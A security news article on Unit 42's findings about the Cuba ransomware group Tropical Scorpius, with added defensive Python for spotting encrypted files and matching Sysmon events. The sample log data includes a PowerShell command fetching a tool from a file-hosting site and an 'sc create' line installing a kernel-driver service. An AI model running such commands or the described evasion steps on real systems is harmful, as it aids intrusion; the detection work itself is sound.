Unit 42 details Tropical Scorpius ransomware using new TTPs, RAT, local privilege escalation tool

New research from Palo Alto Networks’ Unit 42 team revealed that hackers are employing previously unseen tactics, techniques, and procedures (TTPs) alongside the Cuba ransomware, including a novel RAT (remote access trojan) and a new local privilege escalation tool. The activity, currently tracked as Tropical Scorpius, involves a new malware family that weaponizes a local privilege escalation exploit to gain SYSTEM, a new Kerberos tool that Unit 42 tracks as KerberCache, a kernel driver for targeting security products, and the use of the ZeroLogon hacktool.

“The Cuba Ransomware family first surfaced in December 2019. The threat actors behind this ransomware family have since changed their tactics and tooling to become a more prevalent threat in 2022,” Unit 42 researchers wrote in a blog post this week. “This ransomware has historically been distributed through Hancitor, which is usually delivered through malicious attachments. Tropical Scorpius has also been observed exploiting vulnerabilities in Microsoft Exchange Server, including ProxyShell and ProxyLogon.”

According to the researchers, the Tropical Scorpius ransomware group uses double extortion alongside a leak site that exposes organizations that have allegedly been compromised. “That said, this group didn’t have a leak site when first observed in 2019; we suspect the inspiration for adding one came from other ransomware groups such as Maze and REvil. The Cuba Ransomware leak site also includes a paid section where the threat actors share leaks that were sold to an interested party,” they added.

Data in Unit 42’s Ransomware Threat Report recorded observations of Cuba Ransomware impacting 33 organizations. “As of July 2022, Tropical Scorpius has used Cuba Ransomware to impact 27 additional organizations across multiple vectors, such as professional and legal services, state and local government, manufacturing, transportation and logistics, wholesale and retail, real estate, financial services, healthcare, high technology, utilities and energy, construction, and education. A total of 60 organizations were exposed by this ransomware gang on its leak site since the group first surfaced in 2019,” it added.

The researchers said that they suspect the number of victims is larger than the leak site shows since ransomware operators usually don’t release the data publicly if the victim pays the ransom. The FBI says the Cuba Ransomware gang made at least US$43.9 million from ransom payments and has demanded at least $74 million.

While it is clear the Tropical Scorpius threat actors are constantly developing and updating their toolkit, the core Cuba Ransomware payload has remained roughly the same since its discovery in 2019, Unit 42 researchers said. “The cryptographic algorithms are still taken from WolfSSL’s open source repository, specifically ChaCha for file encryption and RSA for key encryption.”

“Similarly to most ransomware families, Cuba Ransomware encrypts files differently depending on their size. If the file is less than 0x200000 bytes in length, the entire file is encrypted,” according to the researchers. “If not, Cuba Ransomware encrypts the files in chunks of 0x100000 bytes, with the break in between the encrypted chunks differing based on the overall size.”

The Unit 42 team also said that each encrypted file is prepended with an initial 1024-byte header containing the magic value ‘FIDEL[dot]CA’, likely a reference to Fidel Castro and in keeping with the Cuba theme. This is followed by an RSA-4096 encrypted block containing the file-specific ChaCha key and nonce. Finally, the extension [dot]cuba is appended to the filename after a file is successfully encrypted.
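The on-disk traits described in the last three paragraphs (the size rule for whole-file versus chunked encryption, the 1024-byte header with its magic value, the RSA-4096 block, and the [dot]cuba extension) are enough to build a simple triage scanner for incident responders. The following Python is an added example, not code from Unit 42 or from the ransomware itself; it checks a file for the extension, the magic value and the high entropy expected of ChaCha ciphertext, and reports which encryption mode the size rule predicts. The entropy cutoff of 7.5 bits per byte and the exact position of the RSA block inside the header are assumptions, and the sample files are constructed in memory.

```python
import math
import random
from pathlib import Path

# On-disk traits of Cuba Ransomware as described in the Unit 42 report.
CUBA_EXTENSION = ".cuba"
CUBA_MAGIC = b"FIDEL.CA"       # magic value at the start of the 1024-byte header
HEADER_LEN = 1024
FULL_ENCRYPT_LIMIT = 0x200000  # files smaller than this are encrypted whole
CHUNK_LEN = 0x100000           # larger files are encrypted in chunks of this size
RSA4096_BLOCK_LEN = 512        # an RSA-4096 ciphertext is 512 bytes
ENTROPY_THRESHOLD = 7.5        # bits/byte; ciphertext sits near 8.0 (assumed cutoff)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: ~8.0 for ciphertext, far lower for text or documents."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def classify_file(name: str, data: bytes) -> dict:
    """Score a file against the traits above and return a triage verdict.
    Compressed or already-encrypted formats also have high entropy, so a
    high-entropy file without the magic value is only 'suspicious'."""
    has_ext = name.lower().endswith(CUBA_EXTENSION)
    has_magic = data.startswith(CUBA_MAGIC)
    # The header is prepended, so the original content follows it.
    original_len = max(len(data) - HEADER_LEN, 0)
    expected_mode = None
    if has_magic:
        expected_mode = "whole" if original_len < FULL_ENCRYPT_LIMIT else "chunked"
    # In either mode the first chunk after the header is ciphertext,
    # so its entropy alone is enough to confirm encryption.
    first_chunk = data[HEADER_LEN:HEADER_LEN + CHUNK_LEN]
    entropy = shannon_entropy(first_chunk)
    high_entropy = entropy >= ENTROPY_THRESHOLD
    if has_magic and high_entropy:
        verdict = "encrypted"
    elif has_ext or has_magic or high_entropy:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"name": name, "verdict": verdict, "extension": has_ext, "magic": has_magic,
            "entropy": round(entropy, 2), "expected_mode": expected_mode,
            "original_len": original_len}


def scan_directory(root: str) -> list:
    """Walk a directory tree and classify every regular file (reads each file fully)."""
    return [classify_file(p.name, p.read_bytes()) for p in Path(root).rglob("*") if p.is_file()]


def build_sample_encrypted_file(body_len: int, seed: int = 1) -> bytes:
    """Constructed sample in the described layout (not real ransomware output):
    magic, a 512-byte stand-in for the RSA-4096 block, zero padding to 1024 bytes,
    then deterministic pseudo-random bytes standing in for ChaCha ciphertext."""
    rng = random.Random(seed)
    rsa_block = bytes(rng.getrandbits(8) for _ in range(RSA4096_BLOCK_LEN))
    header = (CUBA_MAGIC + rsa_block).ljust(HEADER_LEN, b"\x00")
    body = bytes(rng.getrandbits(8) for _ in range(body_len))
    return header + body


if __name__ == "__main__":
    # Constructed inputs: one encrypted-looking file, one plain file, one merely renamed file.
    samples = {
        "invoice.pdf.cuba": build_sample_encrypted_file(4096),
        "report.txt": b"quarterly figures " * 300,
        "notes.docx.cuba": b"just renamed, not encrypted " * 100,
    }
    for fname, blob in samples.items():
        print(classify_file(fname, blob))
```

Run `scan_directory("/mnt/evidence")` against a mounted image to get one verdict per file; the `expected_mode` field tells an analyst whether only part of a large file was encrypted, which matters when deciding what can still be carved from it.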

The Unit 42 researchers also found another major update in the ransom note dropped by the ransomware: the operators no longer rely solely on their Tor site for contact and additionally offer communication via TOX, which is slowly becoming more popular among ransomware groups due to its secure messaging functionality.

Before deploying ransomware, Unit 42 observed Tropical Scorpius using tools and techniques to evade detection and move around in the compromised environment. “Tropical Scorpius leveraged a dropper that writes a kernel driver to the file system called ApcHelper[dot]sys. This targets and terminates security products. The dropper was not signed, however, the kernel driver was signed using the certificate found in the LAPSUS NVIDIA leak,” they added.

The researchers said that upon executing the kernel driver dropper/loader, the kernel dropper uses multiple Windows APIs to find the resource section and load the resource type named ‘Driver.’ The embedded PE file is the driver that will ultimately write to the file system in subsequent API calls.

“After the kernel driver drops onto the file system, the loader will first run a deletion command argument via cmd[dot]exe for the file path,” the Unit 42 researchers said. “After this, it will create a new service using cmd[dot]exe and run the argument below to set up a service for the kernel driver. Then the loader copies the kernel driver responsible for terminating security products onto the file system.”

The core functionality of the kernel driver dropped and loaded is to resolve additional kernel APIs for performing functionality and targeting a list of security products for termination, according to the Unit 42 researchers. “The additional APIs are resolved using a string constant for the desired API name; each Windows API below is used in a function call to MmGetSystemRoutineAddress for returning a pointer to the function. Below is a list of additional kernel APIs resolved that were found within the sample,” they added.

After the additional APIs are resolved, the process of targeting security products begins, the Unit 42 team said. “A do-while loop is set up with the objective of checking the processes running on the system to see if they match an item from the security products targeted,” they added.

The researchers said that the Tropical Scorpius threat actor leveraged various tools for the initial system reconnaissance. “ADFind and Net Scan were downloaded from the web hosting platform tmpfiles[dot]org by using PowerShell’s Invoke-WebRequest. Both tools were dropped onto the same system with shortened names to obscure their purpose.”

Unit 42 evaluates that Tropical Scorpius remains an active threat, as the group’s activity makes it clear that its tradecraft relies on a hybrid of more nuanced tools focused on low-level Windows internals. This approach aids defense evasion, and local privilege escalation can be highly effective during an intrusion.

It recommends that defenders have advanced logging capabilities deployed and appropriately configured, such as Sysmon, Windows Command Line logging, and PowerShell logging – forwarding to a Security Information and Event Management tool (SIEM) to create queries and detection opportunities. Additionally, computers must be patched and up to date wherever possible to reduce attack surfaces related to exploitation techniques.

Furthermore, organizations can deploy an XDR/EDR solution to perform in-memory inspection and detect process injection techniques. Unit 42 also recommends threat hunting for unusual behavior related to security product defense evasion, service accounts used for lateral movement, and domain administrator-related user behavior.
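The logging recommendation above only pays off once the forwarded events are matched against the behaviors the report describes: the tools fetched from tmpfiles[dot]org with Invoke-WebRequest and dropped under shortened names, the service set up for the kernel driver via cmd[dot]exe, and the driver signed with the leaked NVIDIA certificate. The following Python is an added example, not Unit 42's code, of rules a defender could run over Sysmon-style events once they reach a SIEM or a log collector. The sample events are constructed; their paths, service name and download URL are placeholders, not indicators from the report. Sysmon's process-creation event (ID 1) carries an `OriginalFileName` field from the PE version resource, which is what exposes a renamed tool, and its driver-load event (ID 6) carries the `Signature` field. The `sc create` syntax is the standard Windows service-creation command; the report's exact argument is not reproduced on this page, so that rule is an assumption.

```python
import json
import ntpath
import re

# Constructed Sysmon-style events, one JSON object per line (placeholders, not report IoCs).
SAMPLE_LOG = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell.exe -c Invoke-WebRequest -Uri https://tmpfiles.org/dl/PLACEHOLDER/ad.exe -OutFile C:\\Windows\\Temp\\ad.exe"}
{"EventID": 1, "Image": "C:\\Windows\\Temp\\ad.exe", "OriginalFileName": "AdFind.exe", "CommandLine": "ad.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd.exe /c sc create PLACEHOLDERSVC type= kernel binPath= C:\\Windows\\Temp\\ApcHelper.sys"}
{"EventID": 6, "ImageLoaded": "C:\\Windows\\Temp\\ApcHelper.sys", "Signed": "true", "Signature": "NVIDIA Corporation"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "OriginalFileName": "NOTEPAD.EXE", "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "Cmd.Exe", "CommandLine": "cmd.exe /c dir C:\\Users"}
"""

# "sc ... create ... <something>.sys": a service being registered for a driver file.
KERNEL_SERVICE_RE = re.compile(r"\bsc\b.*\bcreate\b.*\.sys\b", re.IGNORECASE)
# Legitimate drivers normally live here; a signed driver elsewhere is worth a look.
WINDOWS_DRIVER_DIR = "\\windows\\system32\\drivers\\"


def basename_lower(path: str) -> str:
    """Windows-style basename, so this also works when run on a Linux SIEM host."""
    return ntpath.basename(path or "").lower()


def rule_tmpfiles_download(ev: dict) -> bool:
    """Invoke-WebRequest pulling a file from the tmpfiles.org hosting platform."""
    cl = ev.get("CommandLine", "").lower()
    return ev.get("EventID") == 1 and "invoke-webrequest" in cl and "tmpfiles.org" in cl


def rule_renamed_binary(ev: dict) -> bool:
    """Executable whose on-disk name differs from its PE OriginalFileName (e.g. AdFind as ad.exe)."""
    orig = ev.get("OriginalFileName", "").lower()
    return ev.get("EventID") == 1 and bool(orig) and orig != basename_lower(ev.get("Image", ""))


def rule_cmd_creates_kernel_service(ev: dict) -> bool:
    """cmd.exe registering a service whose binary is a .sys driver file."""
    return (ev.get("EventID") == 1
            and basename_lower(ev.get("Image", "")) == "cmd.exe"
            and bool(KERNEL_SERVICE_RE.search(ev.get("CommandLine", ""))))


def rule_nvidia_signed_driver_outside_drivers_dir(ev: dict) -> bool:
    """Driver load with an NVIDIA signature from outside the drivers directory.
    NVIDIA-signed drivers are normal on GPU hosts, so the path check keeps noise down."""
    path = ev.get("ImageLoaded", "").lower()
    return (ev.get("EventID") == 6
            and "nvidia" in ev.get("Signature", "").lower()
            and WINDOWS_DRIVER_DIR not in path)


RULES = [
    ("tmpfiles_download", rule_tmpfiles_download),
    ("renamed_binary", rule_renamed_binary),
    ("cmd_creates_kernel_service", rule_cmd_creates_kernel_service),
    ("nvidia_signed_driver_outside_drivers_dir", rule_nvidia_signed_driver_outside_drivers_dir),
]


def detect(raw_log: str) -> list:
    """Run every rule over every event; return one hit per (rule, event) match."""
    hits = []
    events = [json.loads(line) for line in raw_log.splitlines() if line.strip()]
    for idx, ev in enumerate(events):
        for name, rule in RULES:
            if rule(ev):
                hits.append({"rule": name, "event": idx,
                             "evidence": ev.get("CommandLine") or ev.get("ImageLoaded")})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f"[{hit['rule']}] event #{hit['event']}: {hit['evidence']}")
```

Each rule on its own is a lead rather than a verdict; the value is in the sequence. A download from a file-hosting site, a renamed reconnaissance binary, a driver service created from cmd.exe and a driver load from a temp directory on the same host within minutes is the chain the report describes, and a SIEM correlation rule should raise severity when several of these fire together.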

Earlier this month, Zscaler researchers released details of the Industrial Spy ransomware group, which, after its initial promotional campaigns, introduced its own ransomware to carry out double extortion attacks that combine data theft with file encryption. The threat group appears to have also tried Cuba ransomware briefly before developing its own ransomware in May this year.
